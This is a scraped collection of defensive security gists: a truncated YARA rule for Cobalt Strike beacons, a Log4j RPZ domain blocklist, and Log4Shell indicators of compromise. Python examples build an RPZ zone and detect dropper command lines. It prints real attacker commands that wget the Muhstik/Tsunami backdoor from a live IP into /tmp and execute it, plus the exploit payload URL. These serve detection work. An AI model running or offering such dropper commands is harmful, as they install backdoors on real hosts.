// Requires the console module (YARA 4.2.0-rc1 or later)
// Expects decoded (unpacked) Cobalt Strike beacons as input
import "pe"
import "console"
rule CobaltStrike_Watermark_Profiler: Profiler
{
meta:
@yt0ng
yt0ng / log4j-RPZ-list.txt
Last active January 7, 2022 12:21
RPZ for Log4j
############################################################################
# RPZ to detect internal exploitation of Log4j
############################################################################
# Joint work with @craiu https://twitter.com/craiu
# https://github.com/craiu/iocs/blob/main/log4shell/log4j_blocklist.txt
############################################################################
dnspod.cn
bingsearchlib.com
interactsh.com
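The list above is only the trigger domains; to use it you still need an RPZ zone built around them. The Python below is an added example, not part of the gist or of the craiu/iocs repository: it parses a list in the gist's format, renders a BIND RPZ zone for it, and emulates the resolver's QNAME matching so a name can be checked against the list offline. The three-entry sample list is constructed, and the zone defaults to `CNAME rpz-passthru.` (answer the query normally, but log the hit), which is the setting that fits the stated goal of detecting internal exploitation rather than silently blocking it.

```python
"""Build a BIND RPZ zone from a Log4j callback-domain list.

Added example for the gist above; not part of the gist or of the craiu/iocs
repository. The sample list below is constructed in the gist's shape.
"""
import re
from datetime import datetime, timezone

# Constructed sample in the gist's shape: '#' comments, one domain per line.
SAMPLE_LIST = """\
# RPZ to detect internal exploitation of Log4j
dnspod.cn
bingsearchlib.com
interactsh.com
"""

# Hostname syntax check so a stray line never becomes a malformed RR.
DOMAIN_RE = re.compile(r"^(?=.{1,253}$)(?:[a-z0-9-]{1,63}\.)+[a-z]{2,63}$", re.I)


def parse_blocklist(text):
    """Return the domains from a '#'-commented, one-per-line list."""
    names = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip().rstrip(".").lower()
        if not line:
            continue
        if not DOMAIN_RE.match(line):
            raise ValueError(f"not a domain: {raw!r}")
        names.append(line)
    return names


def rpz_zone(domains, serial=None, action="rpz-passthru."):
    """Render a BIND RPZ zone for the given trigger domains.

    'CNAME rpz-passthru.' leaves the answer untouched but the resolver logs
    the RPZ hit, which is what you want when the goal is to *see* which
    internal hosts call back after a JNDI lookup. Pass action="." to turn
    the same zone into an NXDOMAIN block. Each domain gets an exact trigger
    and a wildcard trigger so random subdomains (as interactsh-style
    services use) also match.
    """
    serial = serial or datetime.now(timezone.utc).strftime("%Y%m%d01")
    lines = [
        "$TTL 60",
        f"@ IN SOA localhost. root.localhost. {serial} 3600 600 604800 60",
        "@ IN NS localhost.",
    ]
    for d in domains:
        lines.append(f"{d} CNAME {action}")
        lines.append(f"*.{d} CNAME {action}")
    return "\n".join(lines) + "\n"


def matches_rpz(qname, domains):
    """Emulate RPZ QNAME matching: the name itself or any label under it."""
    q = qname.rstrip(".").lower()
    return any(q == d or q.endswith("." + d) for d in domains)


if __name__ == "__main__":
    doms = parse_blocklist(SAMPLE_LIST)
    print(rpz_zone(doms))
    for name in ("c6pz5x.interactsh.com", "bingsearchlib.com.", "notinteractsh.com"):
        print(f"{name:30} -> {'HIT' if matches_rpz(name, doms) else 'pass'}")
```

Load the rendered zone in named.conf under a `response-policy` statement and watch the resolver's RPZ log channel; an internal host resolving anything under these names after a JNDI string hit your application logs is the signal you are after. Switch `action` to `"."` only once you are sure the list carries no domains your own tooling depends on.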
@yt0ng
yt0ng / gist:8a87f4328c8c6cde327406ef11e68726
Last active December 15, 2021 03:13
Log4j Payload Dropped
45.130.229.168:1389/Exploit.class
Exploit.class 4d040caffa28e6a0fdc0d274547cf1c7983996fc33e51b0b2c511544f030d71b
--> curl http://18.228.7.109/.log/log
log d59dba711478b6c6fdba87a9cfc9af753783c4d9120111a9ef026c9362a8e74b
--> Download of Muhstik/Tsunami Backdoor
wget -O /tmp/pty3 http://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &
wget -O /tmp/pty4 http://18.228.7.109/.log/pty4; chmod +x /tmp/pty4; chmod 700 /tmp/pty4; /tmp/pty4 &
wget -O /tmp/pty2 http://18.228.7.109/.log/pty2; chmod +x /tmp/pty2; chmod 700 /tmp/pty2; /tmp/pty2 &
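The wget lines above are the dropper stage of the chain: fetch to /tmp, chmod, run in the background. As an added example that is not part of the gist, the Python below flags that download-chmod-execute shape in process command lines and separately matches the payload hosts and SHA-256 values the gist lists. The command-line records it scans are constructed; `mirror.example.org` and `/tmp/get.sh` are made-up names included to show that the pattern match fires on the shape of the command independently of the known hosts.

```python
"""Flag the Log4Shell dropper chain in process command lines.

Added example, not part of the gist. IOC hosts and hashes are the ones the
gist lists; the command lines below are constructed.
"""
import hashlib
import re
from urllib.parse import urlparse

# From the gist: payload/C2 hosts and SHA-256 of the dropped files.
IOC_HOSTS = {"45.130.229.168", "18.228.7.109"}
IOC_SHA256 = {
    "4d040caffa28e6a0fdc0d274547cf1c7983996fc33e51b0b2c511544f030d71b": "Exploit.class",
    "d59dba711478b6c6fdba87a9cfc9af753783c4d9120111a9ef026c9362a8e74b": "log (stage-2 script)",
}

# download -> chmod +x / 7xx -> run the same path, as in the gist's wget lines.
DROPPER_RE = re.compile(
    r"(?:wget|curl)\s[^;&|]*?(?P<url>https?://[^\s;&|]+).*?"      # download
    r"chmod\s+(?:\+x|7\d\d)\s+(?P<path>[^\s;&|]+).*?"            # make executable
    r"(?:;|&&|\|\|)\s*(?P=path)(?:\s|$)"                          # execute it
)
URL_RE = re.compile(r"https?://[^\s;&|'\"]+")


def host_of(url):
    """Host part of an http(s) URL, port stripped."""
    return urlparse(url).hostname or ""


def classify_cmdline(cmd):
    """Reasons a command line resembles the Log4Shell dropper; [] if none."""
    reasons = []
    m = DROPPER_RE.search(cmd)
    if m:
        reasons.append(f"download-chmod-exec chain: {m['path']} from {m['url']}")
    for url in URL_RE.findall(cmd):
        if host_of(url) in IOC_HOSTS:
            reasons.append(f"known payload host {host_of(url)}")
    return reasons


def scan(lines):
    """Return (line_no, reasons) for every suspicious command line."""
    return [(n, r) for n, line in enumerate(lines, 1) if (r := classify_cmdline(line))]


def label_sha256(data):
    """Name of the dropped file if its SHA-256 is in the gist, else None."""
    return IOC_SHA256.get(hashlib.sha256(data).hexdigest())


# Constructed process-creation records (command lines only).
SAMPLE_LOG = [
    "java -jar app.jar",
    "wget -O /tmp/pty3 http://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &",
    "curl http://18.228.7.109/.log/log",
    "wget -O /tmp/x.tar.gz http://example.org/x.tar.gz; tar xf /tmp/x.tar.gz",
    "curl -sSL http://mirror.example.org/get.sh -o /tmp/get.sh; chmod +x /tmp/get.sh; /tmp/get.sh",
]

if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_LOG):
        print(f"line {n}: " + "; ".join(reasons))
```

The host and hash matches will go stale as the infrastructure rotates; the command-shape match is the part worth keeping in a detection rule, with the IOC sets refreshed from a feed. Run `label_sha256` over files recovered from /tmp on a suspect host to confirm which stage you are looking at.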